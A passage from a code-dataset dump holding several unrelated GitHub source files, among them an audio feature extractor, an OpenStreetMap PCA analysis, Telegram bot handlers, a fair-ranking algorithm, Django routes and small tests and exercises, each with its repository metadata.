self.params.STFT_HOP_SECONDS\n dur = window + stft_window - stft_hop\n onsets = np.arange(start=0, stop=stim.duration - dur, step=hop)\n\n return ExtractorResult(preds, stim, self, features=labels,\n onsets=onsets, durations=[dur]*len(onsets),\n orders=list(range(len(onsets))))\n\n\n\nclass MFCCEnergyExtractor(MFCCExtractor):\n ''' Low-Quefrency and High-Quefrency Mel-Frequency Spectrum extractor.\n \n Extracts two auditory features representing broad-spectrum information (timbre) \n and fine-scale spectral structure (pitch) respectively.\n Derived from Hanke et al., 2015 (https://doi.org/10.12688/f1000research.6679.1)\n \n This extractor maps selected cepstral coefficients back to the spectrum \n domain by reconstructing the n_mfcc mel-frequency spectrum bands using the \n low-quefrency and high-quefrency mfcc coefficients respectively.\n \n Users can select the top or bottom n_coefs. Non-selected coefficients are \n zeroed out, and the result is mapped back to spectral domain using \n inverse DCT (using librosas's mfcc_to_mel function).\n\n Args:\n n_mfcc (int): specifies the number of MFCCs\n n_coefs (int): cepstrum coefficients to keep in the high/low quefrency spectrum\n hop_length (int): hop length in number of samples\n n_mels (int): Dimensionality of mel frequency spectrum to map back to\n register (str): 'low' or 'high'. Specifies which MFCCs are to be kept.\n norm (str): Normalization type for DCT\n dct_type (int): Discrete cosine transform (DCT) type, default is 2.\n lifter (int): If lifter>0, apply inverse liftering (inverse cepstral filtering)\n librosa_kwargs (optional): Optional named arguments to pass to librosa\n '''\n\n _log_attributes = (\n 'n_mfcc', 'n_coefs', 'hop_length', 'n_mels', 'register', \n 'norm','dct_type', 'lifter', 'librosa_kwargs'\n )\n\n def __init__(self, n_mfcc=48, n_coefs=13, hop_length=1024, \n n_mels=128, register='low', norm='ortho',\n dct_type=2, lifter=0, **librosa_kwargs):\n if register not in ['low', 'high']:\n raise ValueError('register should \\'low\\' or \\'high\\'')\n if dct_type not in [1, 2, 3]:\n raise ValueError('dct_type should be 1, 2, or 3')\n self.n_mfcc = n_mfcc\n self.n_mels = n_mels\n self.n_coefs = n_coefs\n self.hop_length = hop_length\n self.register = register\n self.norm = norm\n self.dct_type = dct_type\n self.lifter = lifter\n self.librosa_kwargs = librosa_kwargs\n\n super().__init__(n_mfcc=n_mfcc, lifter=lifter, dct_type=dct_type,\n norm=norm, n_mels=n_mels, **librosa_kwargs)\n\n def _get_values(self,stim):\n vals = super()._get_values(stim)\n if self.register == 'low':\n vals[self.n_coefs:] = 0\n else:\n vals[:self.n_coefs] = 0\n \n \n mels = librosa.feature.inverse.mfcc_to_mel(\n vals, n_mels=self.n_mels, dct_type=self.dct_type,\n norm=self.norm, lifter=self.lifter)\n \n return mels\n\n def get_feature_names(self):\n return ['mfcc_energy_%d' % i for i in range(self.n_mels)]\n","repo_name":"PsychoinformaticsLab/pliers","sub_path":"pliers/extractors/audio.py","file_name":"audio.py","file_ext":"py","file_size_in_byte":26254,"program_lang":"python","lang":"en","doc_type":"code","stars":288,"dataset":"github-code","pt":"53"} +{"seq_id":"35723653201","text":"from .config import *\nfrom . import access\nimport osmnx as ox\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom sklearn.decomposition import PCA\nfrom IPython.display import display\n\n\"\"\"These are the types of import we might expect in this file\nimport pandas\nimport bokeh\nimport seaborn\nimport matplotlib.pyplot as plt\nimport sklearn.decomposition as decomposition\nimport sklearn.feature_extraction\"\"\"\n\n\"\"\"Place commands in this file to assess the data you have downloaded. How are missing values encoded, how are outliers encoded? What do columns represent, makes rure they are correctly labeled. How is the data indexed. Crete visualisation routines to assess the data (e.g. in bokeh). Ensure that date formats are correct and correctly timezoned.\"\"\"\n\nKEYS_DICT = {\n \"public_transport\": True,\n \"amenity\": True, \n \"leisure\": True, \n \"natural\": True, \n \"landuse:residential\": True,\n \"shop\": True,\n \"tourism\": True,\n \"historic\": True,\n \"aeroway\": True,\n \"healthcare\": True,\n \"industrial\": True,\n \"flood_prone\": True,\n \"highway\": True,\n \"waste\": True\n }\n\nKEYS = [\"public_transport\", \"amenity\", \"leisure\", \"natural\", \"shop\", \"tourism\", \n \"historic\", \"aeroway\", \"healthcare\", \"industrial\", \"flood_prone\", \"highway\", \"waste\"]\n\nTAGS = [(\"amenity\", \"school\")]\n\nLOCATIONS = [(51.5316, -0.1236, \"Kings Cross, London\"), (50.2660, -5.0527, \"Cornwall, England\"), (52.1951, 0.1313, \"Cambridge, England\")]\n\nCOLOURS = ['black', 'red', 'darkorange', 'gold', 'yellow', 'darkolivegreen', 'lime', 'silver',\n 'aquamarine', 'dodgerblue', 'purple', 'fuchsia', 'lightpink', 'peru']\n\ndef view(num_rows=100, seed=1):\n \"\"\"Provide a view of the data that allows the user to verify some aspect of its quality.\"\"\"\n visualise_pois_by_key(LOCATIONS, KEYS)\n visualise_pois_by_key(LOCATIONS, TAGS, tag_version=True)\n credentials = access.get_credentials(\"credentials.yaml\")\n conn = access.create_connection(user=credentials[\"username\"], password=credentials[\"password\"], host=credentials[\"url\"], port=credentials[\"port\"], database=credentials[\"name\"])\n rows = access.get_random_rows(conn, num_rows, seed)\n pois_by_features = get_pois_for_rows(rows)\n visualise_feature_dist(pois_by_features)\n corr, princ_compt = conduct_PCA(pois_by_features)\n vis_PCA1(corr, princ_compt)\n vis_PCA2(corr, princ_compt)\n vis_PCA3(corr, princ_compt)\n\ndef get_pois_for_rows(rows):\n pois_by_features = []\n for i in range(len(rows)):\n count_pois = count_pois_by_features(get_pois(float(rows.iloc[i].latitude), float(rows.iloc[i].longitude), KEYS_DICT), KEYS, TAGS)\n count_pois['price'] = rows.iloc[i].price\n pois_by_features.append(count_pois)\n return pois_by_features\n\ndef conduct_PCA(pois_by_features):\n df = pd.DataFrame(pois_by_features)\n corr = df.corr()\n display(corr.style.background_gradient(cmap='Reds'))\n corr = corr.drop('price')\n corr = corr.drop('price', axis=1)\n pca = PCA(n_components=len(corr))\n princ_compt = pca.fit_transform(corr)\n explained_variance = np.concatenate([np.array([0]), np.cumsum(pca.explained_variance_ratio_)])\n cutoff = np.argmax(explained_variance > 0.95)\n for i in range(1, cutoff + 1):\n print(f\"The explained variance with {i} principle componnts is: {explained_variance[i]}\")\n plt.ylabel('Explained variance')\n plt.xlabel('Number of principle components')\n plt.yticks(np.arange(0, 1.1, 0.1))\n plt.plot(explained_variance)\n plt.show()\n return corr, princ_compt\n \ndef vis_PCA1(corr, princ_compt):\n for i, col in enumerate(corr.columns):\n plt.scatter(princ_compt[i,0], [0], c=COLOURS[i], label=col)\n plt.title(\"1 Principle component\")\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.yticks([])\n plt.show()\n \ndef vis_PCA2(corr, princ_compt):\n for i, col in enumerate(corr.columns):\n plt.scatter(princ_compt[i,0], princ_compt[i,1], c=COLOURS[i], label=col)\n plt.title(\"2 Principle components\")\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n plt.xlabel(\"Principle component 1\")\n plt.ylabel(\"Principle component 2\")\n plt.show()\n\ndef vis_PCA3(corr, princ_compt):\n fig = plt.figure()\n ax = fig.add_subplot(projection='3d')\n for i, col in enumerate(corr.columns):\n ax.scatter(princ_compt[i,0], princ_compt[i,1], princ_compt[i,2], c=COLOURS[i], label=col)\n ax.set_title(\"3 Principle components\")\n ax.legend(loc='center left', bbox_to_anchor=(1.25, 0.5))\n ax.set_xlabel(\"Principle component 1\")\n ax.set_ylabel(\"Principle component 2\")\n ax.set_zlabel(\"Principle component 3\")\n plt.show()\n\n\ndef get_pois(latitude, longitude, tags, box_height=0.02, box_width=0.02):\n north = latitude + box_height/2\n south = latitude - box_height/2\n west = longitude - box_width/2\n east = longitude + box_width/2\n return ox.features_from_bbox(north, south, east, west, tags)\n\ndef get_graph(latitude, longitude, box_height=0.02, box_width=0.02):\n north = latitude + box_height/2\n south = latitude - box_height/2\n west = longitude - box_width/2\n east = longitude + box_width/2\n return ox.graph_from_bbox(north, south, east, west)\n\ndef get_box(latitude, longitude, box_height=0.02, box_width=0.02):\n north = latitude + box_height/2\n south = latitude - box_height/2\n west = longitude - box_width/2\n east = longitude + box_width/2\n return north, south, west, east\n\ndef count_pois_by_features(pois, keys, tags):\n count_by_features = {}\n for key in keys:\n try:\n count_by_features[key] = len(pois[pois[key].isna() == False])\n except:\n count_by_features[key] = 0\n for key, tag in tags:\n try:\n count_by_features[tag] = len(pois[pois[key] == tag])\n except:\n count_by_features[tag] = 0\n if key in count_by_features:\n count_by_features[key] -= count_by_features[tag]\n return count_by_features\n\ndef visualise_pois_by_key(locations, keys, box_height=0.02, box_width=0.02, tag_version=False):\n pois = []\n graphs = []\n\n for loc in locations:\n pois.append(get_pois(loc[0], loc[1], KEYS_DICT, box_height, box_width))\n graphs.append(get_graph(loc[0], loc[1], box_height, box_width))\n \n _, ax = plt.subplots(len(keys), len(locations), figsize=(len(locations[0][2]), (len(keys)) * 4))\n\n for i, loc in enumerate(locations):\n for j, key in enumerate(keys):\n try: \n _, edges = ox.graph_to_gdfs(graphs[i])\n area = ox.geocode_to_gdf(loc[2], which_result=1)\n if len(keys) > 1:\n sub_ax = ax[j][i]\n else:\n sub_ax = ax[i]\n area.plot(ax=sub_ax, facecolor=\"white\")\n edges.plot(ax=sub_ax, linewidth=1, edgecolor=\"dimgray\")\n north, south, west, east = get_box(loc[0], loc[1], box_height, box_width)\n sub_ax.set_xlim([west, east])\n sub_ax.set_ylim([south, north])\n sub_ax.set_xlabel(\"longitude\")\n sub_ax.set_ylabel(\"latitude\")\n if tag_version:\n sub_ax.set_title(f\"{loc[2]} {key[0]}={key[1]}\")\n pois_subset = pois[i][pois[i][key[0]] == key[1]]\n else:\n sub_ax.set_title(f\"{loc[2]} {key}\")\n pois_subset = pois[i][pois[i][key].isna() == False]\n pois_subset.plot(ax=sub_ax, color=\"blue\", alpha=0.7, markersize=10)\n except KeyError:\n print(f\"{loc[2]} has no {key} keys\")\n plt.tight_layout()\n plt.show()\n \ndef visualise_feature_dist(pois_by_features, bins=10):\n features = {}\n for key in pois_by_features[0].keys():\n for pois in pois_by_features:\n features[key] = features.get(key, []) + [pois[key]]\n _, ax = plt.subplots(len(features)//3 + 1, 3, figsize=(len(next(iter(features.keys()))), len(features) * 1.5))\n for i, feature in enumerate(features.items()):\n sub_ax = ax[i//3][i%3]\n sub_ax.set_title(feature[0])\n sub_ax.hist(feature[1], bins=bins)\n plt.show()","repo_name":"Isaac-d22/ADS_final_assignment","sub_path":"fynesse/assess.py","file_name":"assess.py","file_ext":"py","file_size_in_byte":8285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40805638860","text":"##coding=utf-8\nfrom __future__ import (absolute_import, division, print_function,\n unicode_literals)\n\n\n\nimport json\nimport numpy as np\nimport tensorflow as tf\n\nfrom collections import namedtuple#返回元组数据\nfrom resnet.models.nnlib import concat as _concat\nfrom resnet.models.model_factory import RegisterModel\nfrom resnet.models.resnet_model import ResNetModel\nfrom resnet.utils import logger\n\nlog = logger.get()\n\n@RegisterModel(\"revnet\")\nclass RevNetModel(ResNetModel):\n def __init__(self,\n config,\n is_training=True,\n inference_only=False,\n inp=None,\n label=None,\n dtype=tf.float32,\n batch_size=None,\n apply_grad=True,\n idx=0):\n if config.manmual_gradients:\n self._wd_hidden = config.wd#隐藏层衰减率\n assert self._wd_hidden > 0.0,\"Not applying weight decay!\"#判断隐藏层的衰减率是否大于0\n dd = config.__dict__#获取配置内容,包括key和value\n\n #config2是干嘛用的????????\n config2 = json.loads(json.dumps(config.__dict__),\n object_hook=lambda d:namedtuple('X',d.keys())(*d.values()))\n dd = config2.__dict__\n dd[\"wd\"] = 0.0\n config2 = json.loads(\n json.dumps(dd),\n object_hook=lambda d:namedtuple('X',d.keys())(*d.values()))\n assert config2.wd == 0.0,\"weight decay not cleared\"\n assert config.wd > 0,\"weight decay not cleared\"\n else:\n config2 = config\n super(RevNetModel, self).__init__(\n config2,\n is_training = is_training,\n inference_only=inference_only,\n inp = inp,\n label=label,\n batch_size=batch_size,\n apply_grad=apply_grad\n )\n\n","repo_name":"jainszhang/LearnDM","sub_path":"DL/revnet-test/resnet/models/revnet.py","file_name":"revnet.py","file_ext":"py","file_size_in_byte":1948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18246481143","text":"catalog_mapping = {\n 'caj': {\n 'name': 'Čaj',\n 'template': 'tea.html'\n },\n 'kava': {\n 'name': 'Káva',\n 'template': 'coffee.html',\n },\n 'orechy': {\n 'name': 'Ořechy',\n 'template': 'nuts.html',\n },\n 'susene-ovoce': {\n 'name': 'Sušené ovoce',\n 'template': 'dried-fruit.html',\n },\n 'vazene-bonbony': {\n 'name': 'Vážené bonbony',\n 'template': 'weighted-candy.html',\n },\n 'bylinne-kapky': {\n 'name': 'Bylinné kapky',\n 'template': 'herbal-drops.html',\n },\n 'bylinne-sirupy': {\n 'name': 'Bylinné sirupy',\n 'template': 'herbal-syrups.html',\n },\n 'ovocne-sirupy': {\n 'name': 'Ovocné sirupy',\n 'template': 'fruit-syrups.html',\n },\n 'med': {\n 'name': 'Med',\n 'template': 'honey.html',\n },\n 'alkoholicke-napoje': {\n 'name': 'Alkoholické nápoje',\n 'template': 'alcoholic-beverages.html',\n },\n 'kosmetika': {\n 'name': 'Kosmetika',\n 'template': 'cosmetics.html',\n },\n 'oleje-a-octy': {\n 'name': 'Oleje a octy',\n 'template': 'oils.html',\n },\n 'porcelan': {\n 'name': 'Porcelán',\n 'template': 'porcelain.html',\n },\n 'accessories': {\n 'name': 'Příslušenství',\n 'template': 'accessories.html',\n },\n}\n","repo_name":"just-paja/cajovyobchudek.cz","sub_path":"website/mapping.py","file_name":"mapping.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"cs","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21352621407","text":"# -*- coding: utf-8 -*-\n\n\"\"\"题目描述\n在一个字符串(1<=字符串长度<=10000,全部由字母组成)中找到第一个只出现一次的字符,并返回它的位置\n\"\"\"\n\nfrom collections import OrderedDict\nclass Solution:\n def FirstNotRepeatingChar(self, s):\n if len(s) < 1 or len(s) > 10000:\n return -1\n # write code here\n table = OrderedDict()\n postable = {}\n for idx, ch in enumerate(s):\n if ch not in table:\n table[ch] = 1\n postable[ch] = idx\n else:\n table[ch] += 1\n\n for k, v in table.items():\n if v == 1:\n return postable[k]\n return -1\n\nif __name__ == '__main__':\n s = Solution()\n n = s.FirstNotRepeatingChar('NXWtnzyoHoBhUJaPauJaAitLWNMlkKwDYbbigdMMaYfkVPhGZcrEwp')\n print(n)\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"interview/CyC2018_Interview-Notebook/剑指offer/50.py","file_name":"50.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"} +{"seq_id":"28143413424","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.utils.emoji import emojize\n\nfrom loader import dp, bot, _\nfrom keyboards.reply.reply_kb import markup_general_menu, back_kb, markup_organaiser_menu, proof_yes_no_kb, \\\n check_intention_for_me, check_obligation_for_me\nfrom models.db_service import DBService\nfrom states.menu_states import Menu, IntentionTo\nfrom utils.functions import is_digit, text_sum_digit, get_status_emoji, check_number_dict, create_list_intention, \\\n text_intention_to, text_need_intention_to_obligation, text_need_intention_to_sponsor, text_obligation_to, \\\n text_need_obligation, text_need_obligation_to_sponsor, text_proof_forgive_obligation_from, \\\n text_final_forgive_obligation_from, text_forgive_obligation_to\n\ndbs = DBService()\n\n\nasync def global_menu(message):\n await Menu.global_menu.set()\n markup = await markup_general_menu()\n await bot.send_message(message.chat.id, _('Меню'), reply_markup=markup)\n\n\nasync def intention_to_me(message, state: FSMContext):\n markup = await back_kb()\n intentions = await dbs.intentions.get_intentions(statuses=[1], to_id=message.chat.id)\n obligations = await dbs.intentions.get_intentions(statuses=[11], to_id=message.chat.id)\n\n data = await state.get_data()\n dict_intention_to = data[\"dict_intention_to\"]\n list_intention = await create_list_intention(dict_intention_to, to_id=True)\n text = emojize(_(\"В вашу пользу {} :heart: и {} :handshake:\\n{}\\n\")).format(len(intentions), len(obligations),\n list_intention)\n text += _(\"Введите номер записи, чтобы посмотреть подробную информацию или изменить\")\n await IntentionTo.list_intention.set()\n await bot.send_message(message.chat.id, text, reply_markup=markup)\n\n\n@dp.message_handler(state=IntentionTo.list_intention)\nasync def dict_intention_to_menu(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n\n if _(\"Назад\") in in_text:\n await Menu.organaiser_menu.set()\n markup = await markup_organaiser_menu()\n user = await dbs.users.get_user(message.chat.id)\n emoji_status = await get_status_emoji(user.status)\n text = _(\"Органайзер\") + emoji_status\n await bot.send_message(message.chat.id, text, reply_markup=markup)\n return\n\n if not await is_digit(in_text):\n text = await text_sum_digit()\n await bot.send_message(message.chat.id, text)\n return\n\n data = await state.get_data()\n dict_intention_to = data[\"dict_intention_to\"]\n\n if in_text not in dict_intention_to:\n text = await check_number_dict()\n await bot.send_message(message.chat.id, text)\n return\n\n id_intention_to = dict_intention_to[in_text]\n intention = await dbs.intentions.get_intention_from_id(id_intention_to)\n if intention.status == 1:\n text_intention = await text_intention_to(id_intention_to)\n await state.update_data(id_intention_to=id_intention_to)\n markup_intention_settings_kb = await check_intention_for_me()\n await IntentionTo.intention_settings.set()\n\n await bot.send_message(message.chat.id, text_intention, reply_markup=markup_intention_settings_kb)\n\n elif intention.status == 11:\n text_obligation = await text_obligation_to(id_intention_to)\n await state.update_data(id_obligation_to=id_intention_to)\n markup_obligation_settings_kb = await check_obligation_for_me()\n await IntentionTo.obligation_settings.set()\n\n await bot.send_message(message.chat.id, text_obligation, reply_markup=markup_obligation_settings_kb)\n\n\n@dp.message_handler(state=IntentionTo.intention_settings)\nasync def intention_to_me_settings_menu(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n\n if _(\"Попросить\") in in_text:\n data = await state.get_data()\n id_intention_to = data[\"id_intention_to\"]\n intention = await dbs.intentions.get_intention_from_id(id_intention_to)\n\n text_me = await text_need_intention_to_obligation()\n await bot.send_message(message.chat.id, text_me)\n\n text_to = await text_need_intention_to_sponsor(id_intention_to)\n await bot.send_message(intention.from_id, text_to)\n\n await intention_to_me(message, state)\n return\n elif _(\"Назад\") in in_text:\n await intention_to_me(message, state)\n return\n elif _(\"Меню\") in in_text:\n await global_menu(message)\n return\n\n\n@dp.message_handler(state=IntentionTo.obligation_settings)\nasync def obligation_to_me_settings_menu(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n data = await state.get_data()\n id_obligation_to = data[\"id_obligation_to\"]\n obligation = await dbs.intentions.get_intention_from_id(id_obligation_to)\n\n if _(\"Запрос\") in in_text:\n text_me = await text_need_obligation(id_obligation_to)\n await bot.send_message(message.chat.id, text_me)\n\n text_to = await text_need_obligation_to_sponsor(id_obligation_to)\n await bot.send_message(obligation.from_id, text_to)\n\n await intention_to_me(message, state)\n return\n elif _(\"Простить\") in in_text:\n text_me = await text_proof_forgive_obligation_from(id_obligation_to)\n await IntentionTo.obligation_forgive_proof.set()\n markup = await proof_yes_no_kb()\n await bot.send_message(message.chat.id, text_me, reply_markup=markup)\n return\n\n elif _(\"Назад\") in in_text:\n await intention_to_me(message, state)\n return\n elif _(\"Меню\") in in_text:\n await global_menu(message)\n return\n\n\n@dp.message_handler(state=IntentionTo.obligation_forgive_proof)\nasync def obligation_to_me_forgive(message: types.Message, state: FSMContext):\n in_text = message.text\n await bot.delete_message(message.chat.id, message.message_id)\n data = await state.get_data()\n id_obligation_to = data[\"id_obligation_to\"]\n obligation = await dbs.intentions.get_intention_from_id(id_obligation_to)\n\n if _(\"Да\") in in_text:\n text_from = await text_final_forgive_obligation_from(id_obligation_to)\n text_to = await text_forgive_obligation_to(id_obligation_to)\n\n await dbs.intentions.update_status_from_id(id_obligation_to, status=0, active=0)\n\n await bot.send_message(message.chat.id, text_from)\n await bot.send_message(obligation.from_id, text_to)\n\n await global_menu(message)\n return\n elif _(\"Нет\") in in_text:\n text_obligation = await text_obligation_to(id_obligation_to)\n\n markup_obligation_settings_kb = await check_obligation_for_me()\n await IntentionTo.obligation_settings.set()\n\n await bot.send_message(message.chat.id, text_obligation, reply_markup=markup_obligation_settings_kb)\n return","repo_name":"exodus-media/exodusbot_aiogram","sub_path":"handlers/organaiser/intention_to_me.py","file_name":"intention_to_me.py","file_ext":"py","file_size_in_byte":7205,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9596721543","text":"#!/usr/bin/env python3.7\n# -*- coding: utf8 -*-\n\nimport matplotlib as mat\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport numpy as np\n\nsns.set(rc={\"figure.figsize\":(8,4)})\nsns.set_context('paper',font_scale=1.5,rc={'lines.linewidth':1.5})\nsns.set_style('ticks')\nmat.rc('text',usetex=True)\nmat.rc('text.latex',preamble=r'\\usepackage[utf8]{inputenc}\\usepackage[T1]{fontenc}\\usepackage[spanish]{babel}\\usepackage{mathpazo}\\usepackage[euler-digits,euler-hat-accent]{eulervm}\\usepackage{amsmath,amsfonts,amssymb}\\usepackage{siunitx}')\n\nx=np.loadtxt('scibar-sim.csv',delimiter=',',comments='#')\ntns=x[0:75,1]\nnew=x[75:150,1]\nold=x[150:,1]\nt=np.arange(-1300,3200,60)\nc=sns.color_palette('deep')\nfig,ax=plt.subplots(nrows=1,ncols=1,sharex=False,sharey=False)\nax.plot(t,tns,ds='steps-mid')\nax.plot(t,old,ds='steps-mid')\nax.plot(t,new,ds='steps-mid')\nax.set_xlim(-1000,3000)\nax.set_ylim(6.2e4,7.4e4)\nax.axvline(x=0,color='black',ls=':')\nax.set_xlabel(r'Tiempo $\\left[\\si{\\second}\\right]$',x=0.9,ha='right')\nax.set_ylabel(r'Cuentas TNS $\\left[\\si{\\per\\minute}\\right]$')\nplt.tight_layout(pad=1.0)\nplt.savefig('scibar-sim.pdf')\nplt.show()\n","repo_name":"anzorenam/tesis","sub_path":"images/scibar-sim.py","file_name":"scibar-sim.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16665939314","text":"#input: original rank, group information\n#output: an alternative P-Fair rank where the Kendall Tau distance is minimized.\n\nimport pandas as pd\nimport numpy as np\nimport timeit\nimport csv\n\n\ndef GrBinaryIPF(rank,group):\n Rho0 = []\n Rho1 = []\n for i in rank:\n if group[i] == 1:\n Rho0.append(i)\n else:\n Rho1.append(i)\n\n j = 1\n rankDic = {}\n for itm in rank:\n rankDic[itm] = j\n j = j + 1\n\n urgent = []\n Rout = []\n P1count = 0\n P0count = 0\n\n Fp0 = len(Rho0)/len(rank)\n Fp1 = len(Rho1)/len(rank)\n\n i = 1\n while len(Rho0) != 0 or len(Rho1) != 0:\n #print(Rout)\n if P1count >= len(Rho1):\n Rout.extend(Rho0[P0count:len(Rho0)])\n return Rout\n if P1count >= len(Rho0):\n Rout.extend(Rho1[P1count:len(Rho1)])\n return Rout\n\n if len(urgent) == 0:\n if rankDic[Rho1[P1count]] < rankDic[Rho0[P0count]]:\n Rout.append(Rho1[P1count])\n P1count = P1count + 1\n else:\n Rout.append(Rho0[P0count])\n P0count = P0count + 1\n else:\n if urgent[0] == 'P1':\n Rout.append(Rho1[P1count])\n P1count = P1count + 1\n else:\n Rout.append(Rho0[P0count])\n P0count = P0count + 1\n urgent = []\n # update urgent\n if Fp1 * (i + 1) - P1count >= 1:\n urgent.append('P1')\n\n if Fp0 * (i + 1) - P0count >= 1:\n urgent.append('P0')\n i = i + 1\n #print(i)\n return Rout\n\n\nn_list = [1000,250000,500000,750000,1000000]\nm_list = [10000000]\nm = m_list[0]\n\nwith open('fig_5a_result.csv', 'w', encoding='UTF8') as f:\n writer = csv.writer(f)\n for n in n_list:\n file_lc = r'Data\\single_binary\\normal_data_Lc_n='+str(n)+'_m='+str(m)+'.csv'\n df_lc = pd.read_csv(file_lc,header = None)\n Lc = df_lc.to_numpy()[0]\n\n file_lv = r'Data\\single_binary\\normal_data_Lv_n=' + str(n) + '_m='+str(m)+'.csv'\n df_lv = pd.read_csv(file_lv, header=None)\n Lv = df_lv.to_numpy()[0]\n\n file_a = r'Data\\single_binary\\normal_data_a_n=' + str(n) + '_m='+str(m)+'.csv'\n df_group = pd.read_csv(file_a, header=None)\n group = df_group.to_numpy()[0]\n\n rank = np.argsort(Lv)\n start = timeit.default_timer()\n out = GrBinaryIPF(rank,group)\n end = timeit.default_timer()\n print(\"n = \",n,\" time = \",end - start)\n result = [n,end-start]\n writer.writerow(result)","repo_name":"MdMouinulIslam/RankAggregationProportionate","sub_path":"graphs/Fig_5a_code.py","file_name":"Fig_5a_code.py","file_ext":"py","file_size_in_byte":2578,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2185575167","text":"#Exercicio 6.19 - Conjuntos 1\n\ndef getRepete(A):\n L = list(A) # lista auxiliar\n L.sort() # ordena a lista\n conj = set(list(L)) # gerando conjunto dessa lista\n conj = list(conj) # convertendo o conjunto em lista\n conj.sort() # ordenação da segunda lista\n tam = len(conj) # tamanho da segunda lista \n x = 0 # indexador primeira lista \n while tam > 0: # enquanto a lista a ser comparada não tiver tamanho zero\n if conj[0] == L[x]: # apaga ambos os numeros caso forem iguais\n del conj[0]\n del L[x]\n else: \n x += 1 # incrementa indexador da lista dos repetidos, pois foi encontrado um repetido\n tam = len(conj) # recalcula o tamanho da lista encontrada\n return L # retorna a lista com os valores repetidos\n\n\nA = [1, 3, 4, 4, 5, 6, 7, 7]\nB = [1, 2, 2, 5, 6, 7, 8, 9]\n\na = set(list(A))\nb = set(list(B)) \n\nprint(f\"\\nComuns: {a|b}\")\nprint(f\"somente em A: {a-b}\")\nprint(f\"somente em B: {b-a}\")\n\nc = set(A+B) #concatene as duas listas e converte em conjunto\nd = getRepete(A) + getRepete(B) #concatena as duas listas com os elementos que repetem em cada uma\nd = set(d) #converte em um conjunto\nprint(f\"união não repetem: {c-d}\")\n\ne = set(getRepete(B))\nprint(f\"Primeira sem os repetidos na segunda: {a-e}\\n\")\n\n\n","repo_name":"lucasfstos95/PythonCodes","sub_path":"Exercicios IAPCP/exercicio_6_19.py","file_name":"exercicio_6_19.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24390056535","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path, include\nfrom . import views\n\napp_name = \"APP\"\nurlpatterns = [\n path(\"\", views.index, name=\"index\"),\n path(\"index.html\", views.index, name=\"index2\"),\n path(\"services.html\", views.services, name=\"services\"),\n path(\"blog-home.html\", views.BlogListView.as_view(), name=\"blog\"),\n path(\"team.html\", views.team, name=\"team\"),\n path(\"contact.html\", views.contact, name=\"contact\"),\n path(\"details/<slug>\", views.BlogDetailView.as_view(), name=\"details\"),\n\n\n\n\n]\n","repo_name":"Chukslord1/PDP","sub_path":"APP/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"585705738","text":"import pickle\nfrom unittest.mock import MagicMock\nfrom unittest.mock import patch\n\nimport pytest\nimport torch\n\nfrom innofw.zoo import upload_model\n\n\n@patch(\"innofw.utils.s3_utils.credentials.get_s3_credentials\")\n@patch(\"innofw.utils.s3_utils.S3Handler.upload_file\")\n@patch(\"builtins.input\")\n@pytest.mark.parametrize(\n [\"remote_save_path\", \"experiment_config_path\", \"metrics\"],\n [\n [\n \"https://api.blackhole.ai.innopolis.university/pretrained/model.pickle\",\n \"classification/DS_190423_8dca23dc_ucmerced.yaml\",\n {\"some metric\": 0.04},\n ]\n ],\n)\ndef test_upload_model(\n mock_get_s3_credentials,\n mock_upload_file,\n mock_input,\n tmp_path,\n experiment_config_path,\n remote_save_path,\n metrics,\n):\n ckpt_path = tmp_path / \"model.pkl\"\n with open(ckpt_path, \"wb+\") as f:\n pickle.dump(torch.nn.Module(), f)\n\n mock_input.side_effect = [\"access_key\", \"secret_key\"]\n mock_get_s3_credentials.return_value = MagicMock()\n mock_upload_file.return_value = remote_save_path\n\n # Call the function being tested\n upload_model(\n experiment_config_path,\n ckpt_path,\n remote_save_path,\n metrics,\n )\n\n # Assert that the expected functions were called with the expected arguments\n mock_upload_file.assert_called_once()\n\n\n # Test case 1: Try to upload a file that doesn't exist and check if it raises an exception.\n with pytest.raises(Exception):\n upload_model(\n experiment_config_path,\n \"invalid\",\n remote_save_path,\n metrics,\n )\n","repo_name":"InnopolisUni/innofw","sub_path":"tests/unit/zoo/test_upload.py","file_name":"test_upload.py","file_ext":"py","file_size_in_byte":1609,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"11328274642","text":"# input : aaabccddd\n# ouput : abd\n# explanation : aaabccd -> abccd -> abd\n\n\ndef removalPairElements(string):\n i = 1\n while i < len(string):\n if string[i-1] == string[i]:\n string = string[0:i-1] + string[i+1:]\n i = 1\n i = i+1\n \n if not string:\n print(\"\\nEmpty !\")\n else:\n print(\"\\nReduced String: \"+ string)\n\n\nif __name__ == \"__main__\":\n string = str(input(\"\\nEnter the String: \"))\n\n removalPairElements(string)\n 